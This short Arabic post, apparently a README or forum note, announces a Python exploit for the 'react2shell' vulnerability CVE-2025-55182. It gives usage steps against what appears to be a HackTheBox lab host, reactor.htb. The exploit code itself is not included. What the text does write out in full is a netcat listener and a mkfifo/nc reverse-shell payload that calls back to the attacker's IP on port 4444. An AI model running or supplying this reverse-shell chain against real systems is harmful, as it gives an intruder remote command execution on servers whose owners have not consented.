
لقد أنشأت أداة استغلال بسيطة react2shell CVE-2025-55182 بلغة python
لقد قمت بإنشاء استغلال بسيط لـ react2shell CVE-2025-55182 بلغة بايثون
الاستخدام
احفظ النص البرمجي: احفظ الكود أعلاه كـ exploit.py.
تحديث Hosts: تأكد من أن reactor.htb يحل إلى عنوان IP الهدف في ملف /etc/hosts الخاص بك. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
ابدأ المستمع: افتح نافذة طرفية لاستقبال الصدفة العكسية. nc -lvnp 4444
تنفيذ الاستغلال: قم بتشغيل النص البرمجي مع حمولة الصدفة العكسية. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
استبدل <YOUR_IP> بعنوان IP الخاص بـ tun0 الخاص بك.